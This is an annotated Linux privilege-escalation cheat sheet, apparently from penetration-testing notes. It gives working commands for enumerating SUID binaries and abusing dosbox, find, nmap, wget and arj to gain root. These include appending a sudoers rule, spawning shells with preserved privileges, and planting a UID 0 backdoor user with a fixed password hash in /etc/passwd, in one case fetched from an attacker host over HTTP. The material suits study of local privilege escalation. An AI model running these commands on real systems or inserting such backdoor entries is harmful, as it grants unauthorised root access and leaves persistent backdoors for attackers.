# Enumerate SUID binaries; stderr is dropped because unreadable directories are only noise here.
find / -perm -u=s -type f 2>/dev/null
# dosbox (presumably run via sudo or as SUID): mount /etc as drive C and append a sudoers rule for user "test".
# NOTE(review): nothing validates the appended line (no visudo), so a malformed entry can break sudo
# for every user — write exactly one well-formed rule and keep a way back to undo it.
$ dosbox -c 'mount c /etc' -c 'echo test ALL=(ALL) ALL >> C:\sudoers' -c exit
# find (SUID): spawn a shell from -exec. -p asks the shell to keep the elevated effective uid
# (bash semantics — confirm your /bin/sh honours it); -quit ends the traversal once the first
# -exec succeeds, otherwise a new shell would be spawned for every file found.
find . -exec /bin/sh -p \; -quit
# Build an MD5-crypt ($1$) hash of "pass123" with a fixed salt so the output is reproducible;
# this exact string is embedded in every /etc/passwd entry below, so changing the salt or
# password here means updating those lines too.
$ openssl passwd -1 -salt ignite pass123
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1
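# Writable /etc/passwd: add a UID 0 user whose hash sits in the password field, so no
# /etc/shadow change is needed (field 2 is honoured directly with the usual pam_unix setup).
$ mkdir /tmp/privesc && cd /tmp/privesc
$ cp /etc/passwd .
$ cp passwd passwd.bak          # untouched copy — this is the one to restore from
# UID 0 / GID 0 entry; hash produced by `openssl passwd -1 -salt ignite pass123`
$ echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> ./passwd
$ cp ./passwd /etc/passwd
$ su ch
password: pass123
# Restoring the original: copy back passwd.bak, NOT ./passwd — ./passwd still contains the
# "ch" line, so restoring it would leave the backdoor in place.
$ cp /tmp/privesc/passwd.bak /etc/passwd && rm -rf /tmp/privesc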
# nmap (SUID/sudo) interactive mode: a leading "!" runs a shell command. Only old releases
# accept --interactive (GTFOBins lists 2.02–5.21); newer builds reject the flag, so check
# `nmap --version` first and fall back to the --script variant below.
$ nmap --interactive
nmap> !sh
-----------------------
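# nmap (SUID/sudo) via an NSE script: --script runs arbitrary Lua, so os.execute gives a shell.
$ TF=$(mktemp)                                # private temp file instead of a guessable /tmp name
# -p makes bash keep the elevated effective uid; without it a SUID nmap only yields a plain
# user shell (bash resets euid to the real uid on start). Harmless when nmap runs under sudo.
$ echo 'os.execute("/bin/bash -p")' > "$TF"
$ nmap --script="$TF"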
-----------------------
# Same NSE trick without mktemp. Caveats: /tmp/x.nse is a predictable name in a shared
# directory (another user could pre-create it), and if /bin/sh is bash it drops the
# SUID-granted euid unless started with -p; dash keeps it.
$ echo 'os.execute("/bin/sh")' > /tmp/x.nse
$ nmap --script /tmp/x.nse
# Re-enumerate SUID files; here wget shows up, whose -O lets it overwrite any file as root.
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/wget
Copy the contents of the target's /etc/passwd to your attacking host as a file named `passwd`, append the new root-equivalent entry to it, and serve that directory over HTTP (e.g. `python3 -m http.server 80`) so the SUID wget on the target can fetch it.
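# On the attacker host (192.168.49.60): append the UID 0 entry (same hash as above).
echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> passwd
# On the target. wget -O truncates the output file as soon as it is opened, so a failed
# fetch leaves an EMPTY /etc/passwd and locks everyone out. Confirm the URL answers first
# (--spider does not download) and keep a copy for clean-up once root.
$ cp /etc/passwd /tmp/passwd.bak
$ wget -q --spider http://192.168.49.60/passwd && wget http://192.168.49.60/passwd -O /etc/passwd
$ su ch
password:pass123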
# Re-enumerate SUID files; here arj shows up, which can extract an archive into /etc as root.
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/arj
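# arj (SUID): an archive extracted into /etc/ lands there with root's privileges.
# Work in a private directory rather than bare /tmp — "passwd" and "priv.arj" are
# predictable names in a shared directory that another user could pre-plant.
$ W=$(mktemp -d) && cd "$W"
$ cp /etc/passwd passwd
$ cp passwd passwd.bak          # keep for clean-up once root
# UID 0 / GID 0 entry; hash produced by `openssl passwd -1 -salt ignite pass123`
$ echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> passwd
$ arj a priv passwd             # member is stored under the relative name "passwd"
$ arj x priv.arj /etc/          # extracts it as /etc/passwd; arj prompts before overwriting
→ Yes                           # confirm the overwrite prompt
$ su ch
Password: pass123
# clean-up (as root): cp "$W"/passwd.bak /etc/passwd && rm -rf -- "$W"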